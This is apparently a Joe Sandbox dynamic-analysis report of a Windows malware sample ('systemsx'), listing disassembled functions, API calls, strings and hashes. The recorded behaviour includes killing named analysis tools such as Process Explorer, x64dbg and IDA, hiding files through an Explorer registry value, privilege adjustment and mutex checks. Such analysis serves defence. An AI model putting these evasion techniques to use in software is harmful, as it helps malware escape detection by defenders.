                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: 7d2b34d4bcf7a111ccfc8ebf4ec6a1aed911b25f6cb60f7d88c677f11a31b45e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07110371A0C68681EBB0AF36E4D876AA3A0FB84B54F808335D69D43698DF3DD514DB10
                                                                                                                                                                                                                          Function 00007FF7948333EC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                                                          • Opcode ID: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                                                                          • Instruction ID: 00b37a10ff2e3b4db42dd1b57a96fb2f4b7c3d9971e5289449404875d4515a3b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0AF3190C14382EE759F63E188779A3E0AB69759FC04135D28C03594DA3DD568CF26
                                                                                                                                                                                                                          Function 00007FF7948346E4 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: 7d5b8ef0eac1e66450e653064f49765d59d03f61bbebf8036432faa6da5e88bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2481ED32608B8182EA60DF66F48476AE7A0FBC9B95F508135EE8D83768DF7CD454CB10
                                                                                                                                                                                                                          Function 00007FF7948330DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948345C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833117), ref: 00007FF79483460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948345C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833117), ref: 00007FF794834649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948345C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833117), ref: 00007FF794834654
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79483311C), ref: 00007FF794833BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833B84: RegSetValueExW.ADVAPI32 ref: 00007FF794833BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833B84: RegCloseKey.ADVAPI32 ref: 00007FF794833C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF794833C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF794833E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: Process32FirstW.KERNEL32 ref: 00007FF794833E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CloseHandle.KERNEL32 ref: 00007FF794833E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: wcscmp.MSVCRT ref: 00007FF794833E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: OpenProcess.KERNEL32 ref: 00007FF794833EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: TerminateProcess.KERNEL32 ref: 00007FF794833ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CloseHandle.KERNEL32 ref: 00007FF794833ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: Process32NextW.KERNEL32 ref: 00007FF794833EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833E24: CloseHandle.KERNEL32 ref: 00007FF794833EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948339B4: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF794833B0C), ref: 00007FF7948339E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7948331C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: bee3bf102bc6823edd35177ba14cdd808383d1a6b1c6c570d45e083ff8ced88b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25216371E1854790EA34BF7AD8D19B4E260AF50754FD0C131E41DA35A69F2CE969C720
                                                                                                                                                                                                                          Function 00007FF794832E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 7d1a3dd6611212d7252c531231591f0ea5427286d447e7fe0d5fc92f1dda5a78
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6701E932A0CA4181E730AF36E894669A760FB88B94F848131E94E43664DF3CD5A5D610
                                                                                                                                                                                                                          Function 00007FF794833E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: a4c50f70ce303c9e62e0942ddee9565e4d1e92a8bfccc395c3819afd75b103ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC21E231A0CA8681E770AF26E8C876AE360FBC4B54F80C235D95E475A8DF3DD455DB10
                                                                                                                                                                                                                          Function 00007FF794832F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction ID: 5247a7b7f37257ad3f53cef33d592bc78de309f97e05bacc020425ade0f50ece
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201C83691CA4682E730AF36E88466DA370FBC8B85FC0C135ED8E83664DE2CD964C610
                                                                                                                                                                                                                          Function 00007FF794833CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: 3a76b65ea05a525df01e4f22529c6fad22828ed0934dac75b5fc7ca9a86c3470
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8031877661DAC585D770EF2AE4D87AAA3A0F788740F404135DA8E83B68DF3DD554CB10
                                                                                                                                                                                                                          Function 00007FF794833B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: 3b8d727cccecf090e983809aec3140a35c465e6a8ce7d78baea841e44a817900
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F012576618A808AD7609F25F884B1AB7A4F788794F805225EB8D43B68EF7CC155CB00
                                                                                                                                                                                                                          Function 00007FF794832F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948346E4: CreateFileW.KERNEL32 ref: 00007FF79483472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: GetCurrentProcess.KERNEL32 ref: 00007FF79483414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: OpenProcessToken.ADVAPI32 ref: 00007FF79483415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF794834186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7948341B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: CloseHandle.KERNEL32 ref: 00007FF7948341BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: OpenProcess.KERNEL32 ref: 00007FF7948341D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: CloseHandle.KERNEL32 ref: 00007FF794834249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF794833037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF79483304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: 2c6db9ac70b35b8312b9b94321a7c95431eeeb434102e0026ad925d28833d7b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7711C570A18A8785EA70FF36E8D4BA9A7A0FB84704F80C135D54D47665EF3CE069DB60

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:12.6%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0.4%
                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                          Total number of Limit Nodes:34
                                                                                                                                                                                                                          execution_graph 10282 402e57 10283 40dfc0 21 API calls 10282->10283 10284 402e5d 10283->10284 10285 40a4f4 5 API calls 10284->10285 10286 402e68 10285->10286 10295 40de80 GetLastError TlsGetValue SetLastError 10286->10295 10288 402e6e 10296 40de80 GetLastError TlsGetValue SetLastError 10288->10296 10290 402e76 10291 409bc0 4 API calls 10290->10291 10292 402e81 10291->10292 10293 40dec0 3 API calls 10292->10293 10294 402e90 10293->10294 10295->10288 10296->10290 7325 401000 memset GetModuleHandleW HeapCreate 7326 401044 7325->7326 7375 40de30 HeapCreate TlsAlloc 7326->7375 7328 401053 7378 40aaa0 7328->7378 7330 40105d 7381 409b40 HeapCreate 7330->7381 7332 40106c 7382 409669 7332->7382 7334 401071 7387 408dee memset InitCommonControlsEx CoInitialize 7334->7387 7336 401076 7388 4053bb InitializeCriticalSection 7336->7388 7338 40107b 7389 405068 7338->7389 7347 40a3da 16 API calls 7348 4010f4 7347->7348 7349 40a348 13 API calls 7348->7349 7350 40110f 7349->7350 7420 40dbca 7350->7420 7352 40112d 7353 405068 4 API calls 7352->7353 7354 40113d 7353->7354 7355 40a3da 16 API calls 7354->7355 7356 401148 7355->7356 7357 40a348 13 API calls 7356->7357 7358 401163 7357->7358 7426 409930 7358->7426 7360 40116f 7432 40de80 GetLastError TlsGetValue SetLastError 7360->7432 7362 401175 7433 402f41 7362->7433 7366 401186 7458 401b8f 7366->7458 7369 40119b 7565 403df3 7369->7565 7909 40e6a0 HeapAlloc HeapAlloc TlsSetValue 7375->7909 7377 40de57 7377->7328 7910 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7378->7910 7380 40aaae 7380->7330 7381->7332 7911 40d353 7382->7911 7386 409687 InitializeCriticalSection 7386->7334 7387->7336 7388->7338 7923 40e130 7389->7923 7391 401095 GetStdHandle 7392 409de0 7391->7392 7930 409ecf 7392->7930 7395 4010c3 7404 40a3da 7395->7404 7396 409e0b 7397 409e14 7396->7397 7398 409e17 HeapAlloc 7396->7398 7397->7398 7399 409e93 HeapFree 7398->7399 7401 409e2e 7398->7401 7400 409ea4 7399->7400 7400->7395 7941 40d819 7401->7941 7405 40a3e3 7404->7405 7406 4010ce 7404->7406 8010 40a496 7405->8010 7415 40a348 HeapAlloc 7406->7415 7409 40d946 9 API calls 7410 40a3f3 7409->7410 7411 40a420 7410->7411 7412 40a40e HeapFree 7410->7412 7413 40a433 HeapFree 7411->7413 7414 40a427 HeapFree 7411->7414 7412->7411 7412->7412 7413->7406 7414->7413 7416 40a367 HeapAlloc 7415->7416 7417 40a37c 7415->7417 7416->7417 7418 40d819 11 API calls 7417->7418 7419 4010e9 7418->7419 7419->7347 8017 40dd1d 7420->8017 7423 40dbe7 RtlAllocateHeap 7424 40dc06 memset 7423->7424 7425 40dc4a 7423->7425 7424->7425 7425->7352 7427 409a50 7426->7427 7428 409a58 7427->7428 7429 409a7a SetUnhandledExceptionFilter 7427->7429 7430 409a61 SetUnhandledExceptionFilter 7428->7430 7431 409a6b SetUnhandledExceptionFilter 7428->7431 7429->7360 7430->7431 7431->7360 7432->7362 8023 40dfc0 7433->8023 7437 402f56 8038 40de80 GetLastError TlsGetValue SetLastError 7437->8038 7439 402fab 8039 40de80 GetLastError TlsGetValue SetLastError 7439->8039 7441 402fb3 8040 40de80 GetLastError TlsGetValue SetLastError 7441->8040 7443 402fbb 8041 40de80 GetLastError TlsGetValue SetLastError 7443->8041 7445 402fc3 8042 40d120 7445->8042 7449 402fde 8047 405eb0 7449->8047 7451 402fe6 8057 405170 TlsGetValue 7451->8057 7453 40117c 7454 40dec0 TlsGetValue 7453->7454 7455 40df06 RtlReAllocateHeap 7454->7455 7456 40dee9 RtlAllocateHeap 7454->7456 7457 40df27 7455->7457 7456->7457 7457->7366 7459 40dfc0 21 API calls 7458->7459 7460 401b9e 7459->7460 8082 40de80 GetLastError TlsGetValue SetLastError 7460->8082 7462 401ba4 8083 40de80 GetLastError TlsGetValue SetLastError 7462->8083 7464 401bb6 8084 40de80 GetLastError TlsGetValue SetLastError 7464->8084 7466 401bbe 8085 409698 7466->8085 7470 401bca LoadLibraryExW 7471 4051a0 3 API calls 7470->7471 7472 401bd7 EnumResourceTypesW FreeLibrary 7471->7472 7489 401c02 7472->7489 7473 401e16 7473->7473 7474 401ca0 7475 40a496 4 API calls 7474->7475 7477 401cab 7475->7477 7476 40de80 GetLastError TlsGetValue SetLastError 7476->7489 8093 40de80 GetLastError TlsGetValue SetLastError 7477->8093 7479 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7479->7489 7480 401cb1 8094 40de80 GetLastError TlsGetValue SetLastError 7480->8094 7482 401cb9 8095 40de80 GetLastError TlsGetValue SetLastError 7482->8095 7484 401cc1 8096 40de80 